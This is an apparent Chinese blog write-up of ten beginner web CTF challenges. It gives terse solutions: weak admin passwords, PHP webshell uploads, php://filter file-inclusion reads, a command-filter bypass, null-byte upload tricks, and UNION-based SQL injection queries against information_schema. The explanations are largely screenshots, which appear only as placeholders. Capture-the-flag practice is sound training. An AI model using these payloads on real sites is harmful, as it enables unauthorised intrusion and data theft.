首页 > 其他分享 >Web10道签到题

Web10道签到题

时间:2023-02-03 20:12:22浏览次数:36  
标签:include 题目 签到 Web10 flag table php schema

题目1

image
万能密码

题目2

弱口令 admin 123456登录后台,文件管理上传
<?php system('cat /tmp/flag');?>
image
image

题目3

image

题目4

F12发现include.php
include.php?file=php://filter/read=convert.base64-encode/resource=include.php
查看文件源码,发现upload.php
上传图片马
image
include.php包含一下
image

题目5

?rce=ca\t%09/tmp/flag

题目6

查表名
?id=-1 union select 1,2,group_concat(table_name)from(information_schema.tables)where(table_schema=database())
image
查flag表的列名
?id=-1 union select 1,2,group_concat(column_name)from(information_schema.columns)where(table_schema=database())and(table_name='flag')
image
查flag
http://122.114.225.41:20126/?id=-1%20union%20select%201,2,(flag)from(flag)
image

题目7

image
做个图片马,1.png%00.php
image

题目8

image

题目9

admin 123456登录后台 admin/upload.php上传一个一句话马
image
然后
上传图片管理那里右键查看路径
image

题目10

image

标签:include,题目,签到,Web10,flag,table,php,schema
From: https://www.cnblogs.com/V3g3t4ble/p/17090337.html

相关文章